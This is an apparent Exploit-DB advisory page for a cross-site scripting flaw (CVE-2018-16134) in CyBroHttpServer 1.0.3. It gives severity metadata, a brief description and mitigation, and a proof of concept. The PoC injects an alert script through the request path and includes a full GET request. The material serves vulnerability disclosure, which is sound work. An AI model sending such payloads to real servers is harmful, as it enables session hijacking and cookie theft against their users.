Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting

vendor:

CyBroHttpServer

by:

Emre ÖVÜNÇ

6.1

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: CyBroHttpServer

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE: CVE-2018-16134

CPE: a:cybrotech:cybrohttpserver:1.0.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 - 64-bit

2018

Cybrotech CyBroHttpServer 1.0.3 – Cross-Site Scripting

A Cross-Site Scripting (XSS) vulnerability was discovered in Cybrotech CyBroHttpServer 1.0.3. An attacker can send a malicious request containing a script to the vulnerable server, which will be executed in the victim's browser. This can be used to steal cookies, hijack sessions, and perform other malicious activities.

Mitigation:

Input validation should be used to prevent XSS attacks. The application should validate all input data and reject any malicious input.

Source

Exploit-DB raw data:

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows 7 - 64-bit 
# CVE-2018-16134

# PoC
http://<host>/<script>alert('xss');</script>

GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1